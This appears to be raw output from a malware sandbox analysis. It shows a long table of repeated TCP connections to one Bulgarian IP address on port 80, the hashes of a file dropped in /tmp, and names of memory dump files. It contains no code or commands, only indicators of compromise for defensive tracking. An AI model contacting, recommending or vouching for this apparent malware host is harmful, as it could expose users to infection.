| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
Files
/tmp/I7TbY7V53K937e05Mu6IWw6Kv6GOvtVHQt
| MD5 | 998368d7c95ea4293237f2320546e440 |
| SHA1 | 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4 |
| SHA256 | 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736 |
| SHA512 | 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97 |
memory/858-1-0xb674e000-0xb675f044-memory.dmp
memory/884-2-0xb6795000-0xb67a6044-memory.dmp
memory/884-3-0xb6759000-0xb676a044-memory.dmp
memory/896-4-0xb674c000-0xb675d044-memory.dmp